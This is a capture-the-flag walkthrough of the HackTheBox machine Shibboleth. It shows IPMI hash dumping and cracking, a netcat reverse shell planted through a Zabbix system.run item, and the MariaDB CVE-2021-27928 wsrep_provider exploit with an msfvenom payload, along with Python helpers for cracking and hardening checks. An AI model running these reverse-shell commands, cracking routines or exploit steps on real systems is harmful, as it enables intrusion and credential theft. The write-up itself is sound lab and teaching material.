TL;DR
This is a walkthrough writeup of Shibboleth, a Linux box rated medium difficulty on HackTheBox. The initial foothold was gained by dumping the IPMI password hash handed out by the RMCP (asf-rmcp) service on UDP port 623, cracking it offline, and reusing the credentials to get code execution through the Zabbix dashboard. Lateral movement to a second user was possible through password reuse. Privilege escalation to root was achieved by exploiting an eval injection vulnerability (CVE-2021-27928) in the MariaDB version running on the box.
Walkthrough
Shibboleth Writeup: Scanning Network
Scanning ports with Nmap :
Command : nmap -p 80 -sC -sV -A -n -Pn -oN nmap.initial 10.10.11.124
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.41
|_http-title: Did not follow redirect to http://shibboleth.htb/
We see an Apache web server (httpd 2.4.41) on TCP port 80, redirecting to the hostname shibboleth.htb.
Scanning the UDP ports :
Command : nmap -sU --min-rate 1000 -n -Pn $IP
Nmap scan report for 10.10.11.124
Host is up (0.26s latency).
Not shown: 989 open|filtered udp ports (no-response)
PORT STATE SERVICE
137/udp closed netbios-ns
623/udp open asf-rmcp
1022/udp closed exp2
1038/udp closed mtqp
18485/udp closed unknown
19933/udp closed unknown
22053/udp closed unknown
22986/udp closed unknown
32815/udp closed unknown
49154/udp closed unknown
58797/udp closed unknown
We have UDP port 623 open, running the asf-rmcp service.
Website Enumeration
On browsing to the IP address we are redirected to shibboleth.htb, which indicates that the server uses name-based virtual hosting. Add the matching entry to the /etc/hosts file :
10.10.11.124 shibboleth.htb
I saw that the “Contact Us” form was throwing an error (probably because a required library was not installed on the server):
Nothing useful was found on the site itself, so we move on to directory enumeration.
Dirbuster Scan
/forms/
Readme.txt
This was just a Bootstrap information file :
contact.php
This had the same error message which we encountered earlier :
Sub-Domain Enumeration
We will use the wfuzz tool with the -H flag to set the Host header, because the server is using virtual host routing. The --hl 9 option hides responses with the 9-line body the default virtual host returns, so only hostnames that are routed differently show up :
┌──(root💀kali)-[~/Desktop/Boxes/HTB/Shibboleth]
└─# wfuzz -H "Host: FUZZ.shibboleth.htb" --hl 9 -c -w /usr/share/wordlists/secLists/subdomains-top1million-5000.txt $IP
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://10.10.11.124/
Total requests: 4989
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000099: 200 29 L 219 W 3684 Ch "monitor"
000000346: 200 29 L 219 W 3684 Ch "monitoring"
000000390: 200 29 L 219 W 3684 Ch "zabbix"
Total time: 0
Processed Requests: 4989
Filtered Requests: 4986
Requests/sec.: 0
We found 3 subdomains, so let’s add them to the /etc/hosts file.
10.10.11.124 shibboleth.htb monitor.shibboleth.htb monitoring.shibboleth.htb zabbix.shibboleth.htb
On browsing, all three subdomains lead to the same page –> the Zabbix login page
What is Zabbix ? Zabbix is an open-source monitoring software tool for diverse IT components, including networks, servers, virtual machines and cloud services. Zabbix provides monitoring metrics, among others network utilization, CPU load and disk space consumption.
I tried a bunch of default credentials here, but none of them worked.
I was hitting a wall here, but remember that UDP port we found? Let’s enumerate it.
Enumerating port 623 running asf-rmcp
What is asf-rmcp ? ASF (Alert Standard Format) is a DMTF standard that provides a remote control and alerting interface between management consoles and ASF-aware hosts. RMCP (Remote Management and Control Protocol) is the network protocol a management console uses to remotely control an ASF-aware host. asf-rmcp is just the name Nmap gives to port 623; in practice this port is almost always IPMI, whose IPMI-over-LAN interface runs on RMCP/RMCP+. This makes sense, because the host is running Zabbix, which can monitor hardware through IPMI.
Dumping IPMI hashes
On googling, I stumbled upon this blog 623/UDP/TCP – IPMI – HackTricks
It has a section on “dumping IPMI hashes” using a Metasploit module. The weakness being abused is in the IPMI 2.0 specification itself (CVE-2013-4786): during RAKP authentication the BMC replies to a session request with an HMAC-SHA1 of the session parameters keyed with the named user’s password, before the client has proven anything. Anyone who can guess a valid username therefore gets a hash to crack offline. Going ahead with this :
msf6 auxiliary(scanner/ipmi/ipmi_version) > use auxiliary/scanner/ipmi/ipmi_dumphashes
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > options
Module options (auxiliary/scanner/ipmi/ipmi_dumphashes):
Name Current Setting Required Description
---- --------------- -------- -----------
CRACK_COMMON true yes Automatically crack common passwords as they are obtained
OUTPUT_HASHCAT_FILE no Save captured password hashes in hashcat format
OUTPUT_JOHN_FILE no Save captured password hashes in john the ripper format
PASS_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_passw yes File containing common passwords for offline cracking, one per line
ords.txt
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
RPORT 623 yes The target port
SESSION_MAX_ATTEMPTS 5 yes Maximum number of session retries, required on certain BMCs (HP iLO 4, etc)
SESSION_RETRY_DELAY 5 yes Delay between session retries in seconds
THREADS 1 yes The number of concurrent threads (max one per host)
USER_FILE /usr/share/metasploit-framework/data/wordlists/ipmi_users yes File containing usernames, one per line
.txt
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > set RHOSTS 10.10.11.124
RHOSTS => 10.10.11.124
msf6 auxiliary(scanner/ipmi/ipmi_dumphashes) > run
[+] 10.10.11.124:623 - IPMI - Hash found: Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
We did obtain a password hash for the user Administrator :
Administrator:4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
Cracking the obtained hash using hashcat
The hashcat help lists mode 7300 as IPMI2 RAKP HMAC-SHA1. The hash file must contain only the salt and the hash (the leading Administrator: username from the Metasploit output is dropped); the module’s OUTPUT_HASHCAT_FILE option writes exactly that format.
hashcat.exe -m 7300 -a 0 -o ./wallets/cracked.txt ./wordlists/hash.txt ./wordlists/rockyou.txt
hashcat recovered the password from rockyou.txt; cracked.txt contains the hash followed by the plaintext :
4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:1af2e66206082e7b78a920cc983f862daab424ae
ilovepumkinpie1
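To make clear what hashcat is actually doing in mode 7300, here is an added example (my code, not part of the original writeup, Metasploit or hashcat) that takes the dumped string apart and checks a candidate password the same way. The “salt” is the byte string the BMC authenticates in RAKP message 2: both session IDs, both nonces, the BMC GUID, the requested role, the username length and the username; the hash is HMAC-SHA1 over those bytes keyed with the user’s password. The dumped line is the one from the Metasploit output above; the “Secret123” hash and the short wordlist used to exercise the cracker are constructed here, and the John format string is my assumption about the $rakp$ tag.

```python
import hmac
import hashlib
from typing import Dict, Iterable, Optional

# The line Metasploit printed above, in its "user:salt_hex:hash_hex" form.
DUMPED_HASH = (
    "Administrator:"
    "4458aac582020000479fa54d6008d9318aaf7129bfdcd2cc4ad4221b7e41c0f40c59e380513da442"
    "a123456789abcdefa123456789abcdef140d41646d696e6973747261746f72:"
    "1af2e66206082e7b78a920cc983f862daab424ae"
)


def parse_rakp_salt(salt_hex: str) -> Dict[str, object]:
    """Split the RAKP message 2 auth-code input into the fields the BMC HMACs.

    Layout (IPMI 2.0, RAKP message 2):
      SIDm(4) SIDc(4) Rm(16) Rc(16) GUIDc(16) ROLEm(1) ULENm(1) UNAMEm(ULENm)
    where m = remote console (the attacker) and c = managed system (the BMC).
    """
    b = bytes.fromhex(salt_hex)
    ulen = int(b[57])
    if len(b) != 58 + ulen:
        raise ValueError("salt length does not match the username length byte")
    return {
        "sid_console": b[0:4].hex(),
        "sid_bmc": b[4:8].hex(),
        "rand_console": b[8:24].hex(),
        "rand_bmc": b[24:40].hex(),
        "guid_bmc": b[40:56].hex(),
        "role": int(b[56]),   # low nibble = privilege level (4 = ADMINISTRATOR)
        "ulen": ulen,
        "username": b[58:58 + ulen].decode("ascii"),
    }


def rakp_auth_code(salt_hex: str, password: str) -> str:
    """What the BMC sends back: HMAC-SHA1 keyed with the user's password, over the salt."""
    # HMAC zero-pads keys shorter than the block size, so the BMC's 20-byte password
    # padding produces the same MAC as the raw password used here.
    return hmac.new(password.encode("utf-8"), bytes.fromhex(salt_hex), hashlib.sha1).hexdigest()


def verify_rakp_password(salt_hex: str, hash_hex: str, password: str) -> bool:
    return hmac.compare_digest(rakp_auth_code(salt_hex, password), hash_hex.lower())


def crack_rakp(dump_line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Offline dictionary attack over a Metasploit-style 'user:salt:hash' line."""
    _user, salt_hex, hash_hex = dump_line.strip().split(":")
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if verify_rakp_password(salt_hex, hash_hex, candidate):
            return candidate
    return None


def to_hashcat(dump_line: str) -> str:
    """hashcat -m 7300 wants 'salt_hex:hash_hex' with the username stripped."""
    _user, salt_hex, hash_hex = dump_line.strip().split(":")
    return f"{salt_hex}:{hash_hex}"


def to_john(dump_line: str) -> str:
    """John the Ripper line, assumed format: 'user:$rakp$salt_hex$hash_hex'."""
    user, salt_hex, hash_hex = dump_line.strip().split(":")
    return f"{user}:$rakp${salt_hex}${hash_hex}"


if __name__ == "__main__":
    fields = parse_rakp_salt(DUMPED_HASH.split(":")[1])
    print("username in salt:", fields["username"], "role byte:", hex(fields["role"]))
    print("hashcat line:", to_hashcat(DUMPED_HASH))
    # Constructed mini-wordlist; the last entry is the password hashcat found above.
    print("cracked:", crack_rakp(DUMPED_HASH, ["password", "admin", "ilovepumkinpie1"]))
```

The username is visible in clear inside the salt (the trailing bytes 41646d…72 spell Administrator), which is why the Metasploit module only needs a username list to harvest hashes: a wrong username gets an error, a right one gets a crackable MAC.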
Shibboleth Writeup: Zabbix Dashboard (logging in with obtained creds)
user : Administrator
pass : ilovepumkinpie1
Shibboleth Writeup: Shell as zabbix
Now the next challenge is to get code execution from the access we have on Zabbix. On googling around, I found an old video by Ippsec –> HackTheBox – Zipper – YouTube , in which he shows how to get authenticated code execution on Zabbix :
Go to the “Configuration –> Hosts” section and choose the host you are interested in, shibboleth.htb in our case :
Go to the “Items” section and, at the top right, click “Create Item” :
What is an item in Zabbix ? Items are what gather data from a host. Once you have configured a host, you need to add some monitoring items to start getting actual data.
Fill in the fields, choosing the system.run option from the drop-down list for the “Key” field and putting the reverse shell command inside it. The system.run key takes two arguments, command and mode. The reverse shell command is the first argument (command); for mode we use nowait, because we want the agent to fire the command and return immediately instead of blocking until the command finishes (which it never will) and timing out the item.
Here is the complete key :
system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.11 1337 >/tmp/f,nowait]
Hit the “Test” option and then click “Get value” to run the command and obtain a reverse shell; the item does not even need to be saved. Note that the command runs on the monitored host’s Zabbix agent, not in the web frontend, so this only works when the agent permits remote commands (EnableRemoteCommands=1 on older agents, or an AllowKey=system.run[*] rule on agent 5.0 and later, where system.run is denied by default).
Obtaining a reverse shell as the zabbix user on our listener :
┌──(root💀kali)-[~/Desktop/Boxes/HTB/Shibboleth]
└─# nc -nvlp 1337
listening on [any] 1337 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 32832
/bin/sh: 0: can't access tty; job control turned off
$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
$ which python3
/usr/bin/python3
$ python3 -c "import pty;pty.spawn('/bin/bash')"
zabbix@shibboleth:/$ id
uid=110(zabbix) gid=118(zabbix) groups=118(zabbix)
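As an added example (my code, not the writeup’s or Zabbix’s), here is a small checker that answers the question a defender asks after reading the above: does this agent’s zabbix_agentd.conf let a frontend admin run system.run at all? It mimics the agent’s AllowKey/DenyKey evaluation: rules apply in file order, the first match wins, * is a wildcard, and a key matched by no rule is allowed except system.run, which agent 5.0 and later deny by default; the deprecated EnableRemoteCommands=1 is treated as AllowKey=system.run[*]. The three config snippets are constructed samples, not files taken from the box, and treating EnableRemoteCommands as a rule at its position in the file is my simplification.

```python
import re
from typing import List, Tuple

Rule = Tuple[str, str]  # ("AllowKey" | "DenyKey", pattern)


def _pattern_to_regex(pattern: str) -> "re.Pattern[str]":
    """Zabbix key patterns: '*' matches any run of characters, everything else is literal.
    Built by hand instead of fnmatch, because '[' and ']' are ordinary characters in keys."""
    parts = [re.escape(part) for part in pattern.split("*")]
    return re.compile(".*".join(parts) + r"\Z", re.DOTALL)


def parse_key_rules(conf_text: str) -> List[Rule]:
    """Collect AllowKey/DenyKey rules in file order from zabbix_agentd.conf text."""
    rules: List[Rule] = []
    for raw in conf_text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        name, _, value = line.partition("=")
        name, value = name.strip(), value.strip()
        if name in ("AllowKey", "DenyKey"):
            rules.append((name, value))
        elif name == "EnableRemoteCommands" and value == "1":
            # Deprecated pre-5.0 switch; agent 5.0+ treats it as AllowKey=system.run[*].
            # Assumption in this checker: it takes effect at its position in the file.
            rules.append(("AllowKey", "system.run[*]"))
    return rules


def key_allowed(conf_text: str, key: str) -> bool:
    """First matching rule wins. No match: allowed, except system.run (denied by default)."""
    for action, pattern in parse_key_rules(conf_text):
        if _pattern_to_regex(pattern).match(key):
            return action == "AllowKey"
    return key.split("[", 1)[0].strip() != "system.run"


# The key used above, pointed at the port the nc listener above uses.
REVERSE_SHELL_KEY = (
    "system.run[rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1"
    "|nc 10.10.14.11 1337 >/tmp/f,nowait]"
)

# Constructed sample configs (not captured from the box).
VULNERABLE_CONF = """\
Server=127.0.0.1
ServerActive=127.0.0.1
Hostname=shibboleth.htb
EnableRemoteCommands=1
"""
HARDENED_CONF = """\
Server=127.0.0.1
Hostname=shibboleth.htb
# allow exactly one command, then deny everything else under system.run
AllowKey=system.run[/usr/local/bin/healthcheck.sh]
DenyKey=system.run[*]
"""
DEFAULT_CONF = """\
Server=127.0.0.1
Hostname=shibboleth.htb
"""

if __name__ == "__main__":
    for name, conf in (("vulnerable", VULNERABLE_CONF), ("hardened", HARDENED_CONF), ("default", DEFAULT_CONF)):
        print(f"{name:10s} reverse-shell key allowed: {key_allowed(conf, REVERSE_SHELL_KEY)}")
```

The hardened sample shows the pattern to aim for: an explicit AllowKey for the one command the monitoring actually needs, followed by DenyKey=system.run[*]. Because evaluation stops at the first match, putting the deny rule first would silently block the allowed command too.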
Shibboleth Writeup: User Flag
Shell as ipmi-svc
Enumerating the file system, we found another user, ipmi-svc. The IPMI password cracked earlier also works for this account (password reuse), so we can switch to ipmi-svc with su :
zabbix@shibboleth:/var/www/html$ su ipmi-svc
Password:
ipmi-svc@shibboleth:/var/www/html$
ipmi-svc@shibboleth:~$ cat user.txt
540b1***************************
Privilege Escalation
Further enumeration of the file system turned up the Zabbix server config file, which holds the database credentials :
FILE : /etc/zabbix/zabbix_server.conf
ipmi-svc@shibboleth:~$ cat /etc/zabbix/zabbix_server.conf | grep -v \^\# | grep -v '^$'
LogFile=/var/log/zabbix/zabbix_server.log
LogFileSize=0
PidFile=/run/zabbix/zabbix_server.pid
SocketDir=/run/zabbix
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
SNMPTrapperFile=/var/log/snmptrap/snmptrap.log
Timeout=4
AlertScriptsPath=/usr/lib/zabbix/alertscripts
ExternalScripts=/usr/lib/zabbix/externalscripts
FpingLocation=/usr/bin/fping
Fping6Location=/usr/bin/fping6
LogSlowQueries=3000
StatsAllowedIP=127.0.0.1
DBName=zabbix
DBUser=zabbix
DBPassword=bloooarskybluh
I immediately connected to the MariaDB database with these credentials and found password hashes for the Zabbix frontend users :
ipmi-svc@shibboleth:~$ mysql -D zabbix -u zabbix -p
Enter password:
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
Welcome to the MariaDB monitor. Commands end with ; or \g.
Your MariaDB connection id is 3876
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
MariaDB [zabbix]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| zabbix |
+--------------------+
2 rows in set (0.001 sec)
MariaDB [zabbix]> use zabbix;
Database changed
MariaDB [zabbix]> show tables;
+----------------------------+
| Tables_in_zabbix |
+----------------------------+
********SNIP*******
| users |
*******SNIP*********
MariaDB [zabbix]> select userid,alias,name,surname,passwd from users;
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
| userid | alias | name | surname | passwd |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
| 1 | Admin | Zabbix | Administrator | $2y$10$L9tjKByfruByB.BaTQJz/epcbDQta4uRM/KySxSZTwZkMGuKTPPT2 |
| 2 | guest | | | $2y$10$89otZrRNmde97rIyzclecuk6LwKAsHN0BcvoOKGjbT.BwMBfm7G06 |
| 3 | Administrator | IPMI Service | Account | $2y$10$FhkN5OCLQjs3d6C.KtQgdeCc485jKBWPW4igFVEgtIP3jneaN7GQe |
+--------+---------------+--------------+---------------+--------------------------------------------------------------+
3 rows in set (0.000 sec)
We already had the password for the Zabbix frontend user Administrator, but the database holds two admin-level accounts (Admin and Administrator) with different hashes.
I tried to crack the hash for the Admin user, but it is bcrypt (cost 10), which is very slow to crack. I ran hashcat on it for a while, but soon realized this wasn’t the intended path for rooting the box.
After a lot more enumeration I was again close to hitting a wall, so I went back to checking for exploits against the services running on the box, and found something potentially exploitable.
Vulnerable DB version
The DB version is displayed to us when we log in to the database :
Server version: 10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04
Searching for exploits for this version :
┌──(root💀kali)-[~/Desktop/Boxes/HTB/Shibboleth]
└─# searchsploit mariadb 10
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
MariaDB 10.2 - 'wsrep_provider' OS Command Execution | linux/local/49765.txt
MariaDB Client 10.1.26 - Denial of Service (PoC) | linux/dos/45901.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Papers: No Results
On googling around, I found that MariaDB version 10.3.25 is vulnerable to CVE-2021-27928 :
MariaDB 10.2 Command Execution – Packet Storm (packetstormsecurity.com)
Exploit : An untrusted search path leads to eval injection, in which a database SUPER user can execute OS commands after modifying 'wsrep_provider' and 'wsrep_notify_cmd'. Setting wsrep_provider makes mysqld dlopen() the given file as a Galera provider library, and a shared object’s constructor runs as soon as it is loaded, so any .so the DB user can point the server at is executed with the privileges of the mysqld process. You can read more about the vulnerability at the Packet Storm link above.
# Exploit Title: MariaDB 10.2 /MySQL - 'wsrep_provider' OS Command Execution
# Date: 03/18/2021
# Exploit Author: Central InfoSec
# Version: MariaDB 10.2 before 10.2.37, 10.3 before 10.3.28, 10.4 before 10.4.18, and 10.5 before 10.5.9; Percona Server through 2021-03-03; and the wsrep patch through 2021-03-03 for MySQL
# Tested on: Linux
# CVE : CVE-2021-27928
# Proof of Concept:
# Create the reverse shell payload
msfvenom -p linux/x64/shell_reverse_tcp LHOST=<ip> LPORT=<port> -f elf-so -o CVE-2021-27928.so
# Start a listener
nc -lvp <port>
# Copy the payload to the target machine (In this example, SCP/SSH is used)
scp CVE-2021-27928.so <user>@<ip>:/tmp/CVE-2021-27928.so
# Execute the payload
mysql -u <user> -p -h <ip> -e 'SET GLOBAL wsrep_provider="/tmp/CVE-2021-27928.so";'
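Before running the PoC it is worth checking both preconditions it relies on: a server version inside the ranges the advisory header lists, and a DB account with the global SUPER privilege (SET GLOBAL is refused otherwise). This added example (my code, not part of the writeup, the PoC, or MariaDB) checks both from the server banner and the output of SHOW GRANTS. The banner is the one shown on this page; the grant lines are constructed samples; the fixed versions are the ones quoted in the advisory header above. Distribution packages can backport fixes without changing the upstream version string, so treat the version check as a hint rather than proof.

```python
import re
from typing import Iterable, Optional, Tuple

Version = Tuple[int, int, int]

# Fixed releases from the advisory header above: each branch is vulnerable before these.
FIXED_IN = {
    (10, 2): (10, 2, 37),
    (10, 3): (10, 3, 28),
    (10, 4): (10, 4, 18),
    (10, 5): (10, 5, 9),
}

_BANNER_RE = re.compile(r"^\s*(\d+)\.(\d+)\.(\d+)-MariaDB")
_GRANT_RE = re.compile(r"^\s*GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\b", re.IGNORECASE)


def parse_mariadb_version(banner: str) -> Optional[Version]:
    """'10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04' -> (10, 3, 25); None if not MariaDB."""
    m = _BANNER_RE.match(banner)
    return (int(m.group(1)), int(m.group(2)), int(m.group(3))) if m else None


def vulnerable_to_cve_2021_27928(banner: str) -> Optional[bool]:
    """True/False for branches the advisory lists; None when it says nothing about this build."""
    v = parse_mariadb_version(banner)
    if v is None:
        return None
    fixed = FIXED_IN.get(v[:2])
    if fixed is None:
        return None  # e.g. 10.1 or 10.6: not in the advisory's version list
    return v < fixed


def has_global_super(show_grants: Iterable[str]) -> bool:
    """True if a SHOW GRANTS line gives SUPER (or ALL) on *.*, i.e. enough for SET GLOBAL."""
    for line in show_grants:
        m = _GRANT_RE.match(line)
        if not m or m.group("scope") != "*.*":
            continue  # database-level grants never carry SUPER
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & {"ALL", "ALL PRIVILEGES", "SUPER"}:
            return True
    return False


def poc_preconditions_met(banner: str, show_grants: Iterable[str]) -> bool:
    return vulnerable_to_cve_2021_27928(banner) is True and has_global_super(show_grants)


# Banner as printed by the mysql client on this box.
BOX_BANNER = "10.3.25-MariaDB-0ubuntu0.20.04.1 Ubuntu 20.04"

# Constructed SHOW GRANTS output (not captured from the box).
GRANTS_SUPER = [
    "GRANT ALL PRIVILEGES ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '*HASH'",
]
GRANTS_DB_ONLY = [
    "GRANT USAGE ON *.* TO `zabbix`@`localhost` IDENTIFIED BY PASSWORD '*HASH'",
    "GRANT ALL PRIVILEGES ON `zabbix`.* TO `zabbix`@`localhost`",
]

if __name__ == "__main__":
    print("version in vulnerable range:", vulnerable_to_cve_2021_27928(BOX_BANNER))
    print("global SUPER via ALL on *.* :", has_global_super(GRANTS_SUPER))
    print("db-scoped grants only       :", has_global_super(GRANTS_DB_ONLY))
```

The second check is the one that matters for hardening: a monitoring application’s DB account needs privileges on its own schema only, and the GRANTS_DB_ONLY shape is what makes SET GLOBAL wsrep_provider fail with an access-denied error even on an unpatched server.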
Following the exploit instructions –>
Exploit
Creating a reverse shell payload with msfvenom :
┌──(root💀kali)-[~/Desktop/Boxes/HTB/Shibboleth]
└─# msfvenom -p linux/x64/shell_reverse_tcp LHOST=10.10.14.11 LPORT=6969 -f elf-so -o reverse.so
[-] No platform was selected, choosing Msf::Module::Platform::Linux from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 74 bytes
Final size of elf-so file: 476 bytes
Saved as: reverse.so
I transferred it to the box by serving it from a Python HTTP server and fetching it into /home/ipmi-svc.
Setting the wsrep_provider variable to the path of the payload makes mysqld load it, which gives us a reverse shell. The “Lost connection” error is expected: the payload takes over the server thread as soon as the library is loaded, so the query never returns. The shell comes back as root only because mysqld on this box runs as root; on a default installation the daemon runs as the unprivileged mysql user and the same trick would yield a shell as that user :
MariaDB [zabbix]> SET GLOBAL wsrep_provider="/home/ipmi-svc/reverse.so";
ERROR 2013 (HY000): Lost connection to MySQL server during query
MariaDB [zabbix]>
Shibboleth Writeup: Root Flag
┌──(root💀kali)-[~/Desktop/Boxes/HTB/Shibboleth]
└─# nc -nvlp 6969
listening on [any] 6969 ...
connect to [10.10.14.11] from (UNKNOWN) [10.10.11.124] 51714
id
uid=0(root) gid=0(root) groups=0(root)
pyhton3 -c "import pty;pty.spawn('/bin/bash')"
/bin/sh: 2: pyhton3: not found
python3 -c "import pty;pty.spawn('/bin/bash')"
root@shibboleth:/var/lib/mysql# id
id
uid=0(root) gid=0(root) groups=0(root)
root@shibboleth:/var/lib/mysql# cat /root/root.txt
cat /root/root.txt
7615e***************************
Kudos for rooting Shibboleth. Until next time, keep hacking and do checkout other writeups and blogs on sheerazali.com